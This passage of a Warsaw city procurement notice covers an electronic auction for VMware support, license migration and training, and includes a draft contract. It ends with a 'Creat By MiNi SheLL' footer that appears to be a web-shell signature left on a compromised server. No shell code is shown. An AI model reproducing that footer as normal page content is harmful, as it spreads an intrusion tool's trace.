                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px">http://aukcje.um.warszawa.pl</div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px">http://ogloszeniabzp.um.warszawa.pl/wyszukiwarka.php</div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px">Zamawiający przekazuje zakwalifikowanym Wykonawcom zaproszenie do udziału w licytacji elektronicznej. Zaproszenie zostanie przekazane drogą elektroniczną na adres wskazany we wniosku o dopuszczenie do udziału w licytacji. Treść zaproszenia zawierać będzie adres strony internetowej, na której odbywać się będzie licytacja oraz parametry licytacji elektronicznej takie jak: data i godzina otwarcia, czas trwania i warunki zamknięcia licytacji, cenę wywoławczą, wartość postąpienia minimalnego. 
Loginem do platformy aukcyjnej jest adres mailowy wskazany we wniosku o dopuszczenie do udziału w licytacji, natomiast hasło przypisane do konkretnego loginu Wykonawcy otrzymują w oddzielnym mailu. Jednorazowe hasła dostępu otrzymują wyłącznie nowi użytkownicy platformy aukcyjnej. Po ich otrzymaniu użytkownicy proszeni są o zalogowanie się do platformy aukcyjnej przed rzeczywistą licytacją w celu zmiany hasła jednorazowego. Każdy użytkownik, który w przeszłości logował się do platformy aukcyjnej m.st. Warszawy na adres mailowy (login) wskazany we wniosku o dopuszczenie do udziału w licytacji elektronicznej, proszony jest o sprawdzenie przed rzeczywistą licytacją ważności ustanowionego przez siebie hasła. 
Wykonawca chcący wziąć udział w licytacji elektronicznej musi dysponować sprzętem, spełniającym poniższe wymagania: - posiadać zainstalowany system operacyjny wspierany przez producenta tego systemu (Windows 7/Windows 8/Windows 10 bądź nowszy), - być wyposażony w procesor taktowany zegarem o częstotliwości 1 GHz i posiadać co najmniej 1 GB pamięci RAM (są to wymagania jakie powinien spełnić komputer z systemem Windows 7), - posiadać zainstalowaną przeglądarkę internetową wspieraną przez jej producenta: Microsoft Internet Explorer w wersji co najmniej IE10 albo Mozilla Firefox, - posiadać połączenie z siecią Internet o przepustowości nie mniejszej niż 128 kb/s. 
</div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px">Cena wywoławcza (maksymalna) 450.000,00 zł brutto. 
W trakcie licytacji Wykonawca podaje cenę brutto (z VAT) za wykonanie całego zamówienia. W toku licytacji elektronicznej Zamawiający na bieżąco przekazuje wszystkim wykonawcom informacje o pozycji składanych przez nich ofert, liczbie wykonawców biorących udział w licytacji, także o cenach złożonych przez nich ofert, z tym, że do momentu zamknięcia licytacji elektronicznej nie ujawnia informacji umożliwiających identyfikację Wykonawców. 
Minimalna wysokość postąpienia 2000,00 zł. </div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja jednoetapowa
                  <br />Czas trwania: 15<br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

                Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: 
                <br />

                Data: 09/03/2017 godzina: 10:00<br />

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px">15.03.2017 r. godz. 10:00</div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px">15.03.2017 r. godz. 10:15. Jeśli w podstawowym czasie nie zostanie złożona żadna oferta, lub w ciągu 3 min liczonych od rozpoczęcia kolejnej minuty następującej po tej, w której złożono ostatnią ofertę - jednak nie wcześniej niż po upływie 15 min od otwarcia licytacji. 
UWAGA. Jeżeli dla danej licytacji Zamawiający przewidział zastosowanie mechanizmu dogrywek, to złożenie oferty skutkujące uruchomieniem dogrywki spowoduje przedłużenie czasu pozostałego do zakończenia licytacji o założony czas trwania dogrywki powiększony o sekundy brakujące do pełnej minuty, w której padła oferta uruchamiająca dogrywkę. </div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">Umowa nr BI/B/X/2/2/3//17
zwana dalej Umową zawarta w dniu .... r. w Warszawie, pomiędzy:
miastem stołecznym Warszawą z siedzibą w Warszawie przy Placu Bankowym 3/5, 00-950 Warszawa, NIP: 525-22-48-481, REGON: 015259640, reprezentowanym przez Pana Szymona Krupę  Dyrektora Biura Informatyki i Przetwarzania Informacji Urzędu m.st. Warszawy, działającego na podstawie pełnomocnictwa nr GP-0052/4390/2011 z dnia 06.09.2011 roku, udzielonego przez Prezydenta m.st. Warszawy, Panią Hannę Gronkiewicz-Waltz, zwanym w dalszej części Zamawiającym,
a 
 z siedzibą w , wpisaną do Rejestru Przedsiębiorców KRS, prowadzonego przez Sąd Rejonowy dla m.st. Warszawy, XII Wydział Gospodarczy KRS, pod numerem KRS , posiadającą NIP:  REGON:  i kapitał zakładowy w wysokości zł,
reprezentowaną przez:
zwaną w dalszej części Wykonawcą.
W dalszej części Umowy Zamawiający i Wykonawca będą nazywani Stronami.

Umowa zostaje zawarta po przeprowadzeniu postępowania o udzielenie zamówienia publicznego w trybie licytacji elektronicznej, na podstawie art. 74 ustawy z dnia 29 stycznia 2004 r. - Pzp (tj. Dz. U. z 2015 r. poz. 2164 z późn zm. ).

§ 1
Oświadczenia Stron
1.	Wykonawca oświadcza, że posiada środki techniczne, certyfikaty oraz kwalifikacje i uprawnienia niezbędne do świadczenia usług, o których mowa w § 2 Umowy oraz, że będzie je wykonywać z najwyższą starannością, wykorzystując posiadaną wiedzę i doświadczenie wymagane do realizacji tego typu umów oraz uwzględniając standardy wynikające z profesjonalnego charakteru wykonywanej działalności.
2.	Zamawiający oświadcza, że aktualnie posiada wieczyste licencje obejmujące następujące pola eksploatacji na korzystanie z oprogramowania:
a.	vCenter Server 6 Standard 1 instance  Basic Support do 30.04.2017,
b.	vSphere 6 Enterprise Plus 20 CPUs  Basic Support do 30.04.2017,
c.	vCenter Server 6 Standard 1 instance  Basic Support do 02.06.2017,
d.	vSphere 5 Enterprise Plus 4 CPUs  Basic Support do 02.06.2017,
e.	vSphere 6 Enterprise Plus 4 CPUs  Basic Support do 05.04.2018.
3.	Wykonawca oświadcza, że świadczenie usług, o których mowa w §2 Umowy nie naruszy praw osób trzecich, w szczególności autorskich praw majątkowych oraz praw licencyjnych. Wykonawca oświadcza, że jest uprawniony do świadczenia usług, o których mowa w §2 ust.1 Umowy na warunkach określonych w Umowie. W przypadku naruszenia takich praw, Wykonawca ponosi odpowiedzialność względem osób trzecich oraz Zamawiającego.

§ 2
Przedmiot Umowy
1.	W ramach Umowy Wykonawca zobowiązuje się do zapewnienia Zamawiającemu:
1)	wsparcia technicznego na poziomie Basic Support na całość oprogramowania wymienionego w § 1 ust. 2;
2)	migracji licencji wymienionych w § 1 ust. 2 pkt b do licencji vSphere with Operations Management 6 Enterprise Plus 20 CPUs;
3)	przeprowadzenia dla 3 przedstawicieli Zamawiającego autoryzowanego szkolenia ze ścieżki vRealize Operations Manager: Install, Configure, Manage 6.2;
zgodnie z ofertą Wykonawcy z dnia  stanowiącą Załącznik nr 1 do Umowy.
2.	Usługi wsparcia technicznego, o których mowa w ust. 1 pkt 1 obejmują:
1)	możliwość aktualizacji oprogramowania do najnowszych wersji udostępnionych przez Producenta,
2)	dostęp do aktualnej bazy wiedzy dostępnej na internetowych stronach Producenta,
3)	możliwość pobierania najnowszych wersji instalacyjnych oprogramowania wraz z dokumentacją w języku angielskim,
4)	zapewnienie na żądanie Zamawiającego pomocy w rozwiązaniu problemów wynikłych w trakcie obsługi oprogramowania; do decyzji Zamawiającego pozostaje, czy pomoc będzie udzielana zdalnie czy w siedzibie Zamawiającego,
5)	rozpoczęcie udzielenia pomocy, o której mowa w § 1 ust. 2 lit. d) nastąpi w przeciągu 4 godzin od przekazania żądania pomocy przez Zamawiającego. Czas skutecznego rozwiązania zgłoszonego problemu nie może być dłuższy niż 48 godzin.
6)	żądania udzielenia pomocy Zamawiający będzie kierował telefonicznie na numer  oraz mailowo na adres 

§ 3
Termin wykonania
1.	W przeciągu 30 dni od dnia podpisania Umowy Wykonawca jest zobowiązany do:
1)	dostarczenia Zamawiającemu pisemnego potwierdzenie przyznania Zamawiającemu wsparcia technicznego i rozszerzenia licencji na oprogramowanie i pola eksploatacji wymienione w § 2 ust. 1 i ust. 2. Potwierdzenie będzie sygnowane przez Producenta oprogramowania  firmę Vmware, Inc. Headquarters 3401 Hillview Ave  Palo Alto, CA 94304 USA lub jej reprezentanta w Polsce: Vmware Inc, ul. Inflancka 4, bud. B, I piętro, 00-189 Warszawa.
2)	przeprowadzenia w autoryzowanym przez Producenta ośrodku szkolenia, o którym mowa w § 2 ust.1 pkt 3;
2.	Usługi wsparcia technicznego, o których mowa w § 2 ust. 1 pkt 1 będą świadczone co najmniej do dnia 30 kwietnia 2020 roku.

§ 4
Wynagrodzenie
1.	Tytułem wynagrodzenia za wykonanie przedmiotu Umowy Zamawiający zapłaci Wykonawcy wynagrodzenie w kwocie brutto .. zł (), zwane dalej Wynagrodzeniem.
2.	Zapłata wynagrodzenia nastąpi przelewem na podstawie faktury VAT wystawionej przez Wykonawcę, po potwierdzeniu prawidłowości danych zamieszczonych na fakturze, w terminie 21 dni od daty złożenia faktury w Biurze Informatyki i Przetwarzania Informacji Urzędu m.st. Warszawy, ul. Niecała 2, 00-098 Warszawa, na rachunek bankowy wskazany na fakturze.
3.	Fakturę VAT należy wystawić na: miasto stołeczne Warszawa, Pl. Bankowy 3/5, 00-950 Warszawa, NIP: 525-22-48-481.
4.	Za datę zapłaty strony uznają dzień obciążenia rachunku bankowego Zamawiającego.
5.	Wykonawcy nie przysługuje żadne inne roszczenie o dodatkowe wynagrodzenie, nieprzewidziane w Umowie, ani roszczenie o zwrot kosztów poniesionych w związku z wykonaniem umowy lub usuwaniem wad przedmiotu Umowy.

lub jeżeli w wyniku postępowania o udzielenie zamówienia publicznego zostanie wyłoniony Wykonawca zagraniczny nie posiadający siedziby oraz stałego miejsca wykonywania działalności na terytorium Polski
§ 4
Wynagrodzenie
1.	Tytułem wynagrodzenia za wykonanie przedmiotu Umowy Zamawiający zapłaci Wykonawcy wynagrodzenie w kwocie PLN (.), zwane dalej Wynagrodzeniem, 
2.	Zapłata wynagrodzenia nastąpi przelewem na podstawie faktury wystawionej przez Wykonawcę, po potwierdzeniu prawidłowości danych zamieszczonych na fakturze, w terminie 21 dni od daty złożenia faktury w Biurze Informatyki i Przetwarzania Informacji Urzędu m.st. Warszawy, ul. Niecała 2, 00-098 Warszawa, na rachunek bankowy wskazany na fakturze. 
3.	Fakturę należy wystawić na: miasto stołeczne Warszawa, Pl. Bankowy 3/5, 00-950 Warszawa, NIP: 525-22-48-481.
4.	Za datę zapłaty strony uznają dzień obciążenia rachunku bankowego Zamawiającego.
5.	Wykonawcy nie przysługuje żadne inne roszczenie o dodatkowe wynagrodzenie, nieprzewidziane w Umowie, ani roszczenie o zwrot kosztów poniesionych w związku 
z wykonaniem umowy lub usuwaniem wad przedmiotu Umowy.
6.	Wykonawca oświadcza, że nie jest zarejestrowany w Polsce jako czynny podmiot podlegający podatkowi VAT. W związku z tym obowiązek podatkowy w zakresie podatku VAT spoczywa na Zamawiającym, zgodnie z art. 17 ust. 1 pkt 4 ustawy z dnia 11 marca 2004 r. o podatku od towarów i usług (tj. Dz. U. z 2016 r. poz. 710 z późn. zm.). W związku z powyższym Wykonawca wystawi faktury na kwotę wynagrodzenia bez podatku od towarów i usług VAT. Podatek od towarów i usług będzie rozliczany przez Zamawiającego.
7.	Zamawiający wypłaci wynagrodzenie po potrąceniu świadczeń publicznoprawnych wynikających z przepisów prawa, w tym zwłaszcza kwoty stanowiącej zryczałtowany podatek dochodowy, który Zamawiający jest zobowiązany zapłacić jako płatnik w dniu dokonania zapłaty na podstawie art. 26 ust. 1 z dnia 15 lutego 1992 r. o podatku dochodowym od osób prawnych (tj. Dz. U. z 2016 r., poz.1888  z późn. zm.). Zastosowanie stawki podatku wynikającej z właściwej umowy w sprawie zapobieżenia podwójnemu opodatkowaniu albo niepobranie podatku zgodnie z taką umową jest możliwe pod warunkiem udokumentowania miejsca siedziby płatnika do celów podatkowych, uzyskanym od niego zaświadczeniem (certyfikat rezydencji), wydanym przez właściwy organ administracji podatkowej, złożonym Zamawiającemu wraz z fakturą. Certyfikat powinien zostać dostarczony w oryginale, ewentualnie może to być potwierdzona notarialnie jego kopia. W przypadku niedostarczenia w/w certyfikatu rezydencji w odpowiednim terminie kwota należnego podatku zostanie potrącona z wynagrodzenia, o którym mowa w §4 ust. 1.

§ 5
Kary umowne
1.	Strony ustalają, że w przypadku niewykonania lub nienależytego wykonania Umowy obowiązywać będą kary umowne z następujących tytułów oraz w następującej wysokości:
a.	w przypadku niedotrzymania terminu określonego w § 3 ust. 1 Umowy, Wykonawca zapłaci karę umowną w wysokości 1000 zł (jeden tysiąc złotych) za każdy rozpoczęty dzień opóźnienia,
b.	w przypadku braku świadczenia usługi wsparcia, o której mowa w § 2 ust 1 Umowy, Wykonawca jest zobowiązany do zapłaty kary umownej w wysokości 5000 zł (pięć tysięcy złotych) za każdy miesiąc, w którym stwierdzono ww. okoliczności.
c.	w przypadku przekroczenia terminów określonych w § 2 ust. 2 pkt 5, Wykonawca zapłaci karę umowną w wysokości 500 zł (pięćset złotych) za każdą rozpoczętą godzinę opóźnienia,
2.	Kary umowne będą płatne przez Wykonawcę w terminie 14 dni od daty otrzymania wezwania do zapłaty mającego formę noty księgowej, określającej podstawę naliczenia i wysokość kary umownej.
3.	Wykonawca wyraża zgodę na potrącenie naliczonych kar z wynagrodzenia na podstawie noty księgowej.
4.	Zamawiający uprawniony jest do dochodzenia na zasadach ogólnych odszkodowania przewyższającego wysokość kar umownych zastrzeżonych w niniejszej Umowie.

lub jeżeli w wyniku postępowania o udzielenie zamówienia publicznego zostanie wyłoniony Wykonawca zagraniczny nie posiadający siedziby oraz stałego miejsca wykonywania działalności na terytorium Polski
§ 5
Kary umowne
1.	Strony ustalają, że w przypadku niewykonania lub nienależytego wykonania Umowy obowiązywać będą kary umowne z następujących tytułów oraz w następującej wysokości:
a.	w przypadku niedotrzymania terminu określonego w § 3 ust. 1 Umowy, Wykonawca zapłaci karę umowną w wysokości 1000 PLN (jeden tysiąc PLN) za każdy rozpoczęty dzień opóźnienia,
b.	w przypadku braku świadczenia usługi wsparcia, o której mowa w § 2 ust 1 Umowy, Wykonawca jest zobowiązany do zapłaty kary umownej w wysokości 5000 PLN (pięć tysięcy PLN) za każdy miesiąc, w którym stwierdzono ww. okoliczności.
c.	w przypadku przekroczenia terminów określonych w § 2 ust. 2 pkt 5, Wykonawca zapłaci karę umowną w wysokości 500 PLN (pięćset PLN) za każdą rozpoczętą godzinę opóźnienia,
2.	Kary umowne będą płatne przez Wykonawcę w terminie 14 dni od daty otrzymania wezwania do zapłaty mającego formę noty księgowej, określającej podstawę naliczenia i wysokość kary umownej.
3.	Wykonawca wyraża zgodę na potrącenie naliczonych kar z wynagrodzenia na podstawie noty księgowej.
4.	Zamawiający uprawniony jest do dochodzenia na zasadach ogólnych odszkodowania przewyższającego wysokość kar umownych zastrzeżonych w niniejszej Umowie.
§ 6
Współpraca
1.	Strony ustalają, że ze strony Zamawiającego koordynatorem spraw związanych z realizacją Umowy będzie Pan Krzysztof Sławiński tel. 224433327, email kslawinski@um.warszawa.pl, a ze strony Wykonawcy  tel. , email 
2.	Zmiana osób określonych w ust.1 wymaga poinformowania drugiej Strony w trybie zawiadomienia pisemnego i nie stanowi zmiany Umowy.
§ 7
Odstąpienie od Umowy
Zamawiający może odstąpić od Umowy ze skutkiem natychmiastowym, bez wyznaczania dodatkowego terminu i naliczyć karę umowną w wysokości 20 000 zł (dwadzieścia tysięcy złotych), jeżeli Wykonawca wykonuje obowiązki wynikające z Umowy niezgodnie ze złożoną ofertą lub dokumentacją przetargową postępowania o udzielenie niniejszego zamówienia publicznego. Zamawiający może skorzystać z prawa odstąpienia od Umowy w terminie 30 dni od dnia, w którym dowiedział się o okolicznościach wskazanych w zdaniu pierwszym, uprawniających Zamawiającego do skorzystania z prawa odstąpienia.

§ 8
Klauzula Interesu Publicznego
W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie Umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia Umowy, Zamawiający może odstąpić od Umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać jedynie Wynagrodzenia należnego z tytułu wykonania części Umowy.
§ 9
Ochrona danych osobowych
Wykonanie Umowy nie wiąże się z przetwarzaniem danych w rozumieniu ustawy 
o ochronie danych osobowych, dla których Administratorem Danych jest Prezydent m.st. Warszawy, a co za tym idzie nie wiąże się z dostępem do zasobów systemów informatycznych Urzędu m.st. Warszawy.

§ 10
Poufność informacji
Wykonawca zobowiązuje się do zachowania w tajemnicy, tak w okresie obowiązywania niniejszej Umowy, jak również po jej zakończeniu, wszystkich danych i informacji pozyskanych przy wykonywaniu niniejszej Umowy od Zamawiającego. Wszelkie dane, które Wykonawca otrzymał od Zamawiającego, a co do których nie ma uzasadnienia dalszego przechowywania muszą być trwale usunięte. Wykonawca zobowiązany jest zapewnić przestrzeganie zasad poufności przez wszystkie osoby, którymi posługuje się przy realizacji zobowiązań wynikających z niniejszej Umowy.

§ 11
Postanowienia końcowe
1.	W sprawach nieuregulowanych w niniejszej Umowie mają odpowiednie zastosowanie przepisy polskiego prawa, w tym ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2015 r. poz. 2164 z późn. zm.), ustawy z dnia 23 kwietnia 1964 r. Kodeks cywilny (tekst jedn. Dz. U. z 2016 r., poz.380, z późn. zm.), a w zakresie usług świadczonych drogą elektroniczną przepisy ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (tekst jedn. Dz. U. z 2016 r., poz. 1030 z późn. zm.).
2.	Dokonanie przez Wykonawcę cesji wierzytelności przysługujących mu od Zamawiającego z tytułu wykonania Umowy wymaga uprzedniej pisemnej zgody Zamawiającego pod rygorem nieważności.
3.	Zamawiający uprawniony jest do dochodzenia od Wykonawcy odszkodowania przenoszącego wysokość kar umownych zastrzeżonych w Umowie.
4.	Postanowienia Umowy dotyczące obowiązku zachowania poufności, zakazu cesji, ochrony danych osobowych oraz obowiązku zapłaty kar umownych i odszkodowań pozostają ważne 
i wiążą nadal Strony również w przypadku odstąpienia od Umowy lub jej wypowiedzenia albo rozwiązania przez którąkolwiek ze Stron Umowy.
5.	Wszelkie spory mogące powstać między Stronami w związku z wykonaniem Umową będą rozstrzygane przez sąd właściwy miejscowo dla Zamawiającego. 
6.	Zmiana Umowy wymaga podpisania przez strony pisemnego aneksu pod rygorem nieważności, z zastrzeżeniem postanowień § 6 ust. 2 i § 9 ust. 11 Umowy oraz z zachowaniem przepisu art. 144 ustawy - Prawo zamówień publicznych.
7. Następujące Załączniki do Umowy stanowią jej integralną część: 
a. Załącznik nr 1  Oferta Wykonawcy

8. W przypadku sprzeczności postanowień Umowy z załącznikami, pierwszeństwo mają postanowienia Umowy.
9. Umowa sporządzona została w trzech jednobrzmiących egzemplarzach, jeden dla Wykonawcy, dwa dla Zamawiającego.</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">Zamawiający nie wymaga od Wykonawcy wniesienia zabezpieczenia należytego wykonania umowy.</div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px">w zakresie dotyczącym zagadnień formalno - prawnych: Anna Borkowska, Główny specjalista w Biurze Zamówień Publicznych tel.: 22/ 443 14 18; 
w zakresie dotyczącym licytacji elektronicznej: Ryszard Jóźwik, podinspektor w Biurze Zamówień Publicznych tel.: 22/ 443 14 09 
</div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zmiana Umowy wymaga podpisania przez strony pisemnego aneksu pod rygorem nieważności, z zastrzeżeniem postanowień § 6 ust. 2 i § 9 ust. 11 wzoru Umowy oraz z zachowaniem przepisu art. 144 ustawy - Prawo zamówień publicznych.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/03/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com